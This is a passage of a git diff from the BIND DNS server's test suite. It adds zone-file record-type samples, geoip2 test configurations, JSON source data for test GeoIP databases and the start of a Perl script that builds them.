-all" +spf02 SPF "v=spf1" " -all" + +; type 100 (UINFO - not implemented by BIND - unknown record format only) +uinfo01 UINFO \# 1 01 + +; type 101 (UID - not implemented by BIND - unknown record format only) +uid01 UID \# 1 02 + +; type 102 (GID - not implemented by BIND - unknown record format only) +gid01 GID \# 1 03 + +; type 103 (UNSPEC - not implemented by BIND - unknown record format only) +unspec01 UNSPEC \# 1 04 + +; type 104 +nid NID 10 0014:4fff:ff20:ee64 + +; type 105 +l32 L32 10 1.2.3.4 + +; type 106 +l64 L64 10 0014:4fff:ff20:ee64 + +; type 107 +lp LP 10 example.net. + +; type 108 +eui48 EUI48 01-23-45-67-89-ab + +; type 109 +eui64 EUI64 01-23-45-67-89-ab-cd-ef + +; type 110 -- 248 (unassigned) + +; type 249 +; TKEY is a meta-type and should never occur in master files. +; The text representation is not specified in the draft. +; This example was written based on the bind9 RR parsing code. +;tkey01 TKEY 928321914 928321915 ( +; algorithm-name. ; algorithm +; 65535 ; mode +; 0 ; error +; 3 ; key size +; aaaa ; key data +; 3 ; other size +; bbbb ; other data +; ) +;; A TKEY with empty "other data" +;tkey02 TKEY 928321914 928321915 ( +; algorithm-name. ; algorithm +; 65535 ; mode +; 0 ; error +; 3 ; key size +; aaaa ; key data +; 0 ; other size +; ; other data +; ) + +; type 255 +; * is a meta-type and should never occur in master files. + +; type 256 +uri01 URI 10 20 "https://www.isc.org/" +uri02 URI 30 40 "https://www.isc.org/HolyCowThisSureIsAVeryLongURIRecordIDontEvenKnowWhatSomeoneWouldEverWantWithSuchAThingButTheSpecificationRequiresThatWesupportItSoHereWeGoTestingItLaLaLaLaLaLaLaSeriouslyThoughWhyWouldYouEvenConsiderUsingAURIThisLongItSeemsLikeASillyIdeaButEnhWhatAreYouGonnaDo/" +uri03 URI 30 40 "" + +; type 257 +caa01 CAA 0 issue "ca.example.net; policy=ev" +caa02 CAA 128 tbs "Unknown" +caa03 CAA 128 tbs "" + +; type 258 +avc AVC foo:bar + +; type 259 +doa01 DOA ( 1234567890 1234567890 1 "image/gif" + R0lGODlhKAAZAOMCAGZmZgBmmf///zOZzMz//5nM/zNmmWbM/5nMzMzMzACZ//// + /////////////////yH5BAEKAA8ALAAAAAAoABkAAATH8IFJK5U2a4337F5ogRkp + noCJrly7PrCKyh8c3HgAhzT35MDbbtO7/IJIHbGiOiaTxVTpSVWWLqNq1UVyapNS + 1wd3OAxug0LhnCubcVhsxysQnOt4ATpvvzHlFzl1AwODhWeFAgRpen5/UhheAYMF + dUB4SFcpGEGGdQeCAqBBLTuSk30EeXd9pEsAbKGxjHqDSE0Sp6ixN4N1BJmbc7lI + hmsBich1awPAjkY1SZR8bJWrz382SGqIBQQFQd4IsUTaX+ceuudPEQA7 ) +doa02 DOA 0 1 2 "" aHR0cHM6Ly93d3cuaXNjLm9yZy8= + +; type 260 +amtrelay01 AMTRELAY 0 0 0 +amtrelay02 AMTRELAY 0 1 0 +amtrelay03 AMTRELAY 0 0 1 0.0.0.0 +amtrelay04 AMTRELAY 0 0 2 :: +amtrelay05 AMTRELAY 0 0 3 example.net. +amtrelay06 AMTRELAY \# 2 0004 + +; type 261 -- 32767 (unassigned) + +; type 32768 +ta TA 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) + +; type 32769 +dlv DLV 30795 1 1 ( + 310D27F4D82C1FC2400704EA9939FE6E1CEA + A3B9 ) + +; type 32770 -- 65279 (unassigned) + +; type 65280-65534 (private use) + +https0 HTTPS 0 example.net. +https1 HTTPS 1 . port=60 + +svcb0 SVCB 0 example.net. +svcb1 SVCB 1 . port=60 + +; keydata (internal type used for managed keys) +keydata TYPE65533 \# 0 +keydata TYPE65533 \# 6 010203040506 +keydata TYPE65533 \# 18 010203040506010203040506010203040506 + +; type 65535 (reserved) + +EOF diff --git a/bin/tests/system/geoip2/clean.sh b/bin/tests/system/geoip2/clean.sh new file mode 100644 index 0000000..46de65b --- /dev/null +++ b/bin/tests/system/geoip2/clean.sh @@ -0,0 +1,20 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns2/named.conf +rm -f ns2/example*.db +rm -f dig.out.* rndc.out.* +rm -f ns?/named.run +rm -f ns?/named.memstats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* ns*/*.mkeys* diff --git a/bin/tests/system/geoip2/conf/bad-areacode.conf b/bin/tests/system/geoip2/conf/bad-areacode.conf new file mode 100644 index 0000000..2ca9dd4 --- /dev/null +++ b/bin/tests/system/geoip2/conf/bad-areacode.conf @@ -0,0 +1,38 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port 5300; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + geoip-directory "data"; + allow-query { + geoip area 831; + geoip areacode 831; + geoip metro 828; + geoip metrocode 828; + geoip tz "America/Los_Angeles"; + geoip timezone "America/Los_Angeles"; + geoip postal 95060; + geoip postalcode 95060; + }; +}; diff --git a/bin/tests/system/geoip2/conf/bad-dbname.conf b/bin/tests/system/geoip2/conf/bad-dbname.conf new file mode 100644 index 0000000..9fc5238 --- /dev/null +++ b/bin/tests/system/geoip2/conf/bad-dbname.conf @@ -0,0 +1,30 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; +}; + +view one { + match-clients { geoip db unknown asnum "WX"; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; diff --git a/bin/tests/system/geoip2/conf/bad-netspeed.conf b/bin/tests/system/geoip2/conf/bad-netspeed.conf new file mode 100644 index 0000000..133fd42 --- /dev/null +++ b/bin/tests/system/geoip2/conf/bad-netspeed.conf @@ -0,0 +1,37 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port 5300; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + geoip-directory "data"; + allow-query { + geoip netspeed 100; + geoip metro 828; + geoip metrocode 828; + geoip tz "America/Los_Angeles"; + geoip timezone "America/Los_Angeles"; + geoip postal 95060; + geoip postalcode 95060; + }; +}; diff --git a/bin/tests/system/geoip2/conf/bad-regiondb.conf b/bin/tests/system/geoip2/conf/bad-regiondb.conf new file mode 100644 index 0000000..aebdbed --- /dev/null +++ b/bin/tests/system/geoip2/conf/bad-regiondb.conf @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip db region region "California"; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; diff --git a/bin/tests/system/geoip2/conf/bad-threeletter.conf b/bin/tests/system/geoip2/conf/bad-threeletter.conf new file mode 100644 index 0000000..ec0a9df --- /dev/null +++ b/bin/tests/system/geoip2/conf/bad-threeletter.conf @@ -0,0 +1,35 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +view one { + match-clients { geoip db country country AUS; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; diff --git a/bin/tests/system/geoip2/conf/good-options.conf b/bin/tests/system/geoip2/conf/good-options.conf new file mode 100644 index 0000000..02c5e5d --- /dev/null +++ b/bin/tests/system/geoip2/conf/good-options.conf @@ -0,0 +1,36 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port 5300; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + geoip-directory "data"; + allow-query { + geoip metro 828; + geoip metrocode 828; + geoip tz "America/Los_Angeles"; + geoip timezone "America/Los_Angeles"; + geoip postal 95060; + geoip postalcode 95060; + }; +}; diff --git a/bin/tests/system/geoip2/data/GeoIP2-City.json b/bin/tests/system/geoip2/data/GeoIP2-City.json new file mode 100644 index 0000000..5490d42 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-City.json @@ -0,0 +1,506 @@ +[ + { + "::10.53.0.1/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Redwood City" + } + }, + "location" : { + "metro_code" : "807", + "time_zone" : "America/Los_Angeles" + }, + "postal" : { + "code" : "94063" + }, + "subdivisions" : [ + { + "iso_code" : "CA", + "names" : { + "en" : "California" + } + } + ] + } + }, + { + "::10.53.0.2/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Santa Cruz" + } + }, + "location" : { + "metro_code" : "828", + "time_zone" : "America/Los_Angeles" + }, + "postal" : { + "code" : "95060" + }, + "subdivisions" : [ + { + "iso_code" : "CA", + "names" : { + "en" : "California" + } + } + ] + } + }, + { + "::10.53.0.3/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Oklahoma City" + } + }, + "location" : { + "metro_code" : "650", + "time_zone" : "America/Chicago" + }, + "postal" : { + "code" : "73120" + }, + "subdivisions" : [ + { + "iso_code" : "OK", + "names" : { + "en" : "Oklahoma" + } + } + ] + } + }, + { + "::10.53.0.4/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Ashland" + } + }, + "location" : { + "metro_code" : "556", + "time_zone" : "America/New_York" + }, + "postal" : { + "code" : "23005" + }, + "subdivisions" : [ + { + "iso_code" : "VA", + "names" : { + "en" : "Virginia" + } + } + ] + } + }, + { + "::10.53.0.5/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Atlanta" + } + }, + "location" : { + "metro_code" : "524", + "time_zone" : "America/New_York" + }, + "postal" : { + "code" : "30345" + }, + "subdivisions" : [ + { + "iso_code" : "GA", + "names" : { + "en" : "Georgia" + } + } + ] + } + }, + { + "::10.53.0.6/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Morrison" + } + }, + "location" : { + "metro_code" : "751", + "time_zone" : "America/Denver" + }, + "postal" : { + "code" : "80465" + }, + "subdivisions" : [ + { + "iso_code" : "CO", + "names" : { + "en" : "Colorado" + } + } + ] + } + }, + { + "::10.53.0.7/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Ketchikan" + } + }, + "location" : { + "metro_code" : "747", + "time_zone" : "America/Anchorage" + }, + "postal" : { + "code" : "99901" + }, + "subdivisions" : [ + { + "iso_code" : "AK", + "names" : { + "en" : "Alaska" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Redwood City" + } + }, + "location" : { + "metro_code" : "807", + "time_zone" : "America/Los_Angeles" + }, + "postal" : { + "code" : "94063" + }, + "subdivisions" : [ + { + "iso_code" : "CA", + "names" : { + "en" : "California" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Santa Cruz" + } + }, + "location" : { + "metro_code" : "828", + "time_zone" : "America/Los_Angeles" + }, + "postal" : { + "code" : "95060" + }, + "subdivisions" : [ + { + "iso_code" : "CA", + "names" : { + "en" : "California" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Oklahoma City" + } + }, + "location" : { + "metro_code" : "650", + "time_zone" : "America/Chicago" + }, + "postal" : { + "code" : "73120" + }, + "subdivisions" : [ + { + "iso_code" : "OK", + "names" : { + "en" : "Oklahoma" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Ashland" + } + }, + "location" : { + "metro_code" : "556", + "time_zone" : "America/New_York" + }, + "postal" : { + "code" : "23005" + }, + "subdivisions" : [ + { + "iso_code" : "VA", + "names" : { + "en" : "Virginia" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Atlanta" + } + }, + "location" : { + "metro_code" : "524", + "time_zone" : "America/New_York" + }, + "postal" : { + "code" : "30345" + }, + "subdivisions" : [ + { + "iso_code" : "GA", + "names" : { + "en" : "Georgia" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Morrison" + } + }, + "location" : { + "metro_code" : "751", + "time_zone" : "America/Denver" + }, + "postal" : { + "code" : "80465" + }, + "subdivisions" : [ + { + "iso_code" : "CO", + "names" : { + "en" : "Colorado" + } + } + ] + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + }, + "city" : { + "names" : { + "en" : "Ketchikan" + } + }, + "location" : { + "metro_code" : "747", + "time_zone" : "America/Anchorage" + }, + "postal" : { + "code" : "99901" + }, + "subdivisions" : [ + { + "iso_code" : "AK", + "names" : { + "en" : "Alaska" + } + } + ] + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoIP2-City.mmdb b/bin/tests/system/geoip2/data/GeoIP2-City.mmdb Binary files differnew file mode 100644 index 0000000..79c5314 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-City.mmdb diff --git a/bin/tests/system/geoip2/data/GeoIP2-Country.json b/bin/tests/system/geoip2/data/GeoIP2-Country.json new file mode 100644 index 0000000..83a8ca8 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-Country.json @@ -0,0 +1,242 @@ +[ + { + "::10.53.0.1/128" : { + "continent" : { + "code" : "OC", + "names" : { + "en" : "Oceania" + } + }, + "country" : { + "iso_code" : "AU", + "names" : { + "en" : "Australia" + } + } + } + }, + { + "::10.53.0.2/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + } + } + }, + { + "::10.53.0.3/128" : { + "continent" : { + "code" : "EU", + "names" : { + "en" : "Europe" + } + }, + "country" : { + "iso_code" : "GB", + "names" : { + "en" : "United Kingdom" + } + } + } + }, + { + "::10.53.0.4/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "CA", + "names" : { + "en" : "Canada" + } + } + } + }, + { + "::10.53.0.5/128" : { + "continent" : { + "code" : "SA", + "names" : { + "en" : "South America" + } + }, + "country" : { + "iso_code" : "CL", + "names" : { + "en" : "Chile" + } + } + } + }, + { + "::10.53.0.6/128" : { + "continent" : { + "code" : "EU", + "names" : { + "en" : "Europe" + } + }, + "country" : { + "iso_code" : "DE", + "names" : { + "en" : "Germany" + } + } + } + }, + { + "::10.53.0.7/128" : { + "continent" : { + "code" : "AF", + "names" : { + "en" : "Africa" + } + }, + "country" : { + "iso_code" : "EH", + "names" : { + "en" : "Western Sahara" + } + } + } + }, + { + "::192.0.2.0/120" : { + "continent" : { + "code" : "O1", + "names" : { + "en" : "Other" + } + }, + "country" : { + "iso_code" : "O1", + "names" : { + "en" : "Other" + } + } + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "continent" : { + "code" : "OC", + "names" : { + "en" : "Oceania" + } + }, + "country" : { + "iso_code" : "AU", + "names" : { + "en" : "Australia" + } + } + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "US", + "names" : { + "en" : "United States" + } + } + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "continent" : { + "code" : "EU", + "names" : { + "en" : "Europe" + } + }, + "country" : { + "iso_code" : "GB", + "names" : { + "en" : "United Kingdom" + } + } + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "continent" : { + "code" : "NA", + "names" : { + "en" : "North America" + } + }, + "country" : { + "iso_code" : "CA", + "names" : { + "en" : "Canada" + } + } + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "continent" : { + "code" : "SA", + "names" : { + "en" : "South America" + } + }, + "country" : { + "iso_code" : "CL", + "names" : { + "en" : "Chile" + } + } + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "continent" : { + "code" : "EU", + "names" : { + "en" : "Europe" + } + }, + "country" : { + "iso_code" : "DE", + "names" : { + "en" : "Germany" + } + } + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "continent" : { + "code" : "AF", + "names" : { + "en" : "Africa" + } + }, + "country" : { + "iso_code" : "EH", + "names" : { + "en" : "Western Sahara" + } + } + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoIP2-Country.mmdb b/bin/tests/system/geoip2/data/GeoIP2-Country.mmdb Binary files differnew file mode 100644 index 0000000..7771dc7 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-Country.mmdb diff --git a/bin/tests/system/geoip2/data/GeoIP2-Domain.json b/bin/tests/system/geoip2/data/GeoIP2-Domain.json new file mode 100644 index 0000000..fb8e914 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-Domain.json @@ -0,0 +1,72 @@ +[ + { + "::10.53.0.1/128" : { + "domain" : "one.de" + } + }, + { + "::10.53.0.2/128" : { + "domain" : "two.com" + } + }, + { + "::10.53.0.3/128" : { + "domain" : "three.com" + } + }, + { + "::10.53.0.4/128" : { + "domain" : "four.edu" + } + }, + { + "::10.53.0.5/128" : { + "domain" : "five.es" + } + }, + { + "::10.53.0.6/128" : { + "domain" : "six.it" + } + }, + { + "::10.53.0.7/128" : { + "domain" : "seven.org" + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "domain" : "one.de" + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "domain" : "two.com" + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "domain" : "three.com" + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "domain" : "four.edu" + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "domain" : "five.es" + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "domain" : "six.it" + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "domain" : "seven.org" + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoIP2-Domain.mmdb b/bin/tests/system/geoip2/data/GeoIP2-Domain.mmdb Binary files differnew file mode 100644 index 0000000..fe93dec --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-Domain.mmdb diff --git a/bin/tests/system/geoip2/data/GeoIP2-ISP.json b/bin/tests/system/geoip2/data/GeoIP2-ISP.json new file mode 100644 index 0000000..c6b0a5d --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-ISP.json @@ -0,0 +1,86 @@ +[ + { + "::10.53.0.1/128" : { + "isp" : "One Systems, Inc.", + "organization" : "One Systems, Inc." + } + }, + { + "::10.53.0.2/128" : { + "isp" : "Two Technology Ltd.", + "organization" : "Two Technology Ltd." + } + }, + { + "::10.53.0.3/128" : { + "isp" : "Three Network Labs", + "organization" : "Three Network Labs" + } + }, + { + "::10.53.0.4/128" : { + "isp" : "Four University", + "organization" : "Four University" + } + }, + { + "::10.53.0.5/128" : { + "isp" : "Five Telecom", + "organization" : "Five Telecom" + } + }, + { + "::10.53.0.6/128" : { + "isp" : "Six Company", + "organization" : "Six Company" + } + }, + { + "::10.53.0.7/128" : { + "isp" : "Seven Communications", + "organization" : "Seven Communications" + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "isp" : "One Systems, Inc.", + "organization" : "One Systems, Inc." + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "isp" : "Two Technology Ltd.", + "organization" : "Two Technology Ltd." + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "isp" : "Three Network Labs", + "organization" : "Three Network Labs" + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "isp" : "Four University", + "organization" : "Four University" + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "isp" : "Five Telecom", + "organization" : "Five Telecom" + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "isp" : "Six Company", + "organization" : "Six Company" + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "isp" : "Seven Communications", + "organization" : "Seven Communications" + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoIP2-ISP.mmdb b/bin/tests/system/geoip2/data/GeoIP2-ISP.mmdb Binary files differnew file mode 100644 index 0000000..73f0718 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoIP2-ISP.mmdb diff --git a/bin/tests/system/geoip2/data/GeoLite2-ASN.json b/bin/tests/system/geoip2/data/GeoLite2-ASN.json new file mode 100644 index 0000000..8fad0ce --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoLite2-ASN.json @@ -0,0 +1,86 @@ +[ + { + "::10.53.0.1/128" : { + "autonomous_system_number" : 100001, + "autonomous_system_organization" : "One Systems, Inc." + } + }, + { + "::10.53.0.2/128" : { + "autonomous_system_number" : 100002, + "autonomous_system_organization" : "Two Technology Ltd." + } + }, + { + "::10.53.0.3/128" : { + "autonomous_system_number" : 100003, + "autonomous_system_organization" : "Three Network Labs" + } + }, + { + "::10.53.0.4/128" : { + "autonomous_system_number" : 100004, + "autonomous_system_organization" : "Four University" + } + }, + { + "::10.53.0.5/128" : { + "autonomous_system_number" : 100005, + "autonomous_system_organization" : "Five Telecom" + } + }, + { + "::10.53.0.6/128" : { + "autonomous_system_number" : 100006, + "autonomous_system_organization" : "Six Company" + } + }, + { + "::10.53.0.7/128" : { + "autonomous_system_number" : 100007, + "autonomous_system_organization" : "Seven Communications" + } + }, + { + "fd92:7065:b8e:ffff::1/128" : { + "autonomous_system_number" : 100001, + "autonomous_system_organization" : "One Systems, Inc." + } + }, + { + "fd92:7065:b8e:ffff::2/128" : { + "autonomous_system_number" : 100002, + "autonomous_system_organization" : "Two Technology Ltd." + } + }, + { + "fd92:7065:b8e:ffff::3/128" : { + "autonomous_system_number" : 100003, + "autonomous_system_organization" : "Three Network Labs" + } + }, + { + "fd92:7065:b8e:ffff::4/128" : { + "autonomous_system_number" : 100004, + "autonomous_system_organization" : "Four University" + } + }, + { + "fd92:7065:b8e:ffff::5/128" : { + "autonomous_system_number" : 100005, + "autonomous_system_organization" : "Five Telecom" + } + }, + { + "fd92:7065:b8e:ffff::6/128" : { + "autonomous_system_number" : 100006, + "autonomous_system_organization" : "Six Company" + } + }, + { + "fd92:7065:b8e:ffff::7/128" : { + "autonomous_system_number" : 100007, + "autonomous_system_organization" : "Seven Communications" + } + } +] diff --git a/bin/tests/system/geoip2/data/GeoLite2-ASN.mmdb b/bin/tests/system/geoip2/data/GeoLite2-ASN.mmdb Binary files differnew file mode 100644 index 0000000..05260c0 --- /dev/null +++ b/bin/tests/system/geoip2/data/GeoLite2-ASN.mmdb diff --git a/bin/tests/system/geoip2/data/README.md b/bin/tests/system/geoip2/data/README.md new file mode 100644 index 0000000..e326843 --- /dev/null +++ b/bin/tests/system/geoip2/data/README.md @@ -0,0 +1,23 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +##### Test MMDB databases + +This directory contains test versions of the GeoIP2/GeoLite2 CIty, +Country, Domain, ISP, and ASN databases. The `.mmdb` files are built +from the corresponding `.json` source files; to regenerate them, modify +the source files and run `perl write-test-data.pl`. + +This script is adapted from one in +[https://github.com/maxmind/MaxMind-DB](https://github.com/maxmind/MaxMind-DB). +It depends on the MaxMind:DB:Writer module, which can be found in +CPAN or at +[https://github.com/maxmind/MaxMind-DB-Writer-perl](https://github.com/maxmind/MaxMind-DB-Writer-perl) . diff --git a/bin/tests/system/geoip2/data/write-test-data.pl b/bin/tests/system/geoip2/data/write-test-data.pl new file mode 100755 index 0000000..d12a014 --- /dev/null +++ b/bin/tests/system/geoip2/data/write-test-data.pl @@ -0,0 +1,194 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; +use autodie; +use utf8; + +use Carp qw( croak ); +use Cwd qw( abs_path ); +use File::Basename qw( dirname ); +use File::Slurper qw( read_binary write_binary ); +use Cpanel::JSON::XS qw( decode_json ); +use Math::Int128 qw( MAX_UINT128 string_to_uint128 uint128 ); +use MaxMind::DB::Writer::Serializer 0.100004; +use MaxMind::DB::Writer::Tree 0.100004; +use MaxMind::DB::Writer::Util qw( key_for_data ); +use Net::Works::Network; +use Test::MaxMind::DB::Common::Util qw( standard_test_metadata ); + +my $Dir = dirname( abs_path($0) ); + +sub main { + write_geoip2_dbs(); +} + +sub write_geoip2_dbs { + _write_geoip2_db( @{$_}[ 0, 1 ], 'Test' ) + 